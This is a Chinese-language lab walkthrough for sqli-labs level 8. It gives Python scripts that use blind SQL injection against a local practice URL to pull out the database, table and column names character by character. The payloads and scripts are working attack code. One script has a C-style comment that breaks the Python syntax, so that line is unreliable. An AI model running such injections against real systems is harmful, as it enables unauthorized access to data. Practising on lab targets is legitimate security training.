sqlilabs第八关

?id=1' and sleep(2)--+

发现页面存在注点，使用时间盲注脚本进行注入---

import requests
 
 
def inject_database(url):
    name = ''   #name用于存储猜测出的数据库名称 
    for i in range(1, 20):  # 假设数据库名称长度不超过20
        low = 48  # '0'
        high = 122  # 'z'
        middle = (low + high) // 2   /*low, high, middle 用于二分查找(内层循环使用二分查找法猜测每个字符的ASCII值)*/
        while low < high:
            #构造Payload: payload是SQL注入的有效载荷,尝试猜测当前字符的ASCII值
            payload = "1' and ascii(substr(database(),%d,1))>%d-- " % (i, middle)
            params = {"id": payload}
            r = requests.get(url, params=params) 
            # 判断注入是否成功，依据靶场的返回信息
            if 'You are in' in r.text:  # 只检查包含 "You are in" 的内容，表示成功
                low = middle + 1
            else:
                high = middle
            middle = (low + high) // 2 
        # 只拼接有效字符，跳过空格（ASCII 32）和其他非打印字符
        if middle > 32:  # 跳过空格和不可打印字符
            name += chr(middle)
        print(f"Current database name: {name}")
        low = 48
        high = 122
        middle = (low + high) // 2
 
    print(f"Final database name: {name}")
 
 
if __name__ == "__main__":
    url = "http://127.0.0.1/sqlilabs7/Less-8/index.php"
    inject_database(url)

用一个布尔盲注攻击，从数据库中提取表名

-循环遍历表名的每个字符

-二分查找法：通过ASCII码范围（48到122）进行二分查找，确定每个字符的值

-构造SQL注入Payload：利用substr函数和ascii函数逐字符比较表名的ASCII值

-发送请求并判断结果

-跳过空格和非打印字符：只拼接有效的字符

import requests
 
def inject_table_name(url, database_name):
    table_name = ''
    for i in range(1, 20):  
        low = 48  # '0'
        high = 122  # 'z'
        middle = (low + high) // 2
        while low < high:
            # payload
            payload = f"1' and ascii(substr((select table_name from information_schema.tables where table_schema='{database_name}' limit 0,1),{i},1))>{middle}-- "
            params = {"id": payload}
            r = requests.get(url, params=params)
 
            if 'You are in' in r.text:  
                low = middle + 1
            else:
                high = middle
            middle = (low + high) // 2
        if middle > 32:  # 跳过空格和不可打印字符
            table_name += chr(middle)

        print(table_name)
        low = 48
        high = 122
        middle = (low + high) // 2
 
    print(f"Final table name: {table_name}")
 
if __name__ == "__main__":
    url = "http://127.0.0.1/sqlilabs7/Less-8/index.php"  
    database_name = "security"  # 目标数据库名称
    inject_table_name(url, database_name)

通过payload猜测数据库表的列名

import requests
 
def inject_column_name(url, database_name, table_name):
    column_name = ''
    for i in range(1, 20): 
        low = 48  # '0'
        high = 122  # 'z'
        middle = (low + high) // 2
        while low < high:
            payload = f"1' and ascii(substr((select column_name from information_schema.columns where table_schema='{database_name}' and table_name='{table_name}' limit 0,1),{i},1))>{middle}-- "
            params = {"id": payload}
            r = requests.get(url, params=params)
            if 'You are in' in r.text:  
                low = middle + 1
            else:
                high = middle
            middle = (low + high) // 2
 
        if middle > 32: 
            column_name += chr(middle)
 
        print(column_name)
 
        low = 48
        high = 122
        middle = (low + high) // 2
 
    print(f"Final column name: {column_name}")
 
if __name__ == "__main__":
    url = "http://127.0.0.1/sqlilabs7/Less-8/index.php"  
    database_name = "security"  
    table_name = "users"  # 目标表名
    inject_column_name(url, database_name, table_name)